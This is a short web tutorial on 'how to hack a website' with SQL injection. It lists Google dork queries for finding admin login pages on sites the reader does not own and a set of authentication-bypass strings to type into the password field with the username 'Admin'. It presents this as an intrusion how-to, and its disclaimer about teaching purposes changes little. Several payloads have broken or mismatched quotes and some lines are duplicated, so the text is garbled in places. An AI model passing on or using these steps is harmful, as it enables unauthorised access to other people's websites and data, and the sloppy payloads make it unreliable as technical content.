You may have seen that hackers hack the websites and then make the changes according to them.You must have questioned yourself like Can i do the same? Can i be able to a website?
In this tutorial i will show you how to hack a website using SQL Structured Query Language )injection.
Lets start.
Definition of SQL injection?
It is a technique often used to attack databases through a website.
If your website doesn’t use a database, you can relax a bit; this article doesn’t apply to your site — although you might find it interesting anyway.
Step 1: Finding Vulnerable website
Google is the best partner for your sql injection.We can find the vulnerable websites using goggle dork list.
Open google and below a list of best google dorks are given,you can type any of them in google search box.
Google dorks:-
“inurl:adminlogin.aspx”
“inurl:admin/index.php”
“inurl:administrator.php”
“inurl:administrator.asp”
“inurl:login.asp”
“inurl:adminlogin.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:adminlogin.aspx”
“inurl:admin/index.php”
“inurl:administrator.php”
“inurl:administrator.asp”
“inurl:login.asp”
“inurl:adminlogin.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
Step 2:
Hundreds of results will come up. Open any website. It should look something like-
Welcome to xxxxxxxxxx admin panel-
Username :
Password :
Username :
Password :
For username we always type “Admin” and for password we use sql injection.
Here is the list of some common Sql injection-:
’1′=1
’0″=0
“a”=”a”
(‘x=x”
1=1–
0=0#
‘) or a”=’a
hi” or 1′=1″
Type any of these in Password box. It will look like this:-
Type any of these in Password box. It will look like this:-
username:Admin
password:’”a”=”a”
password:’”a”=”a”
Disclaimer - This post is only for teaching purpose. Any illegal use of this will not be entertained and website owner is not responsible for any kind of illegal activity through it.
Join The Community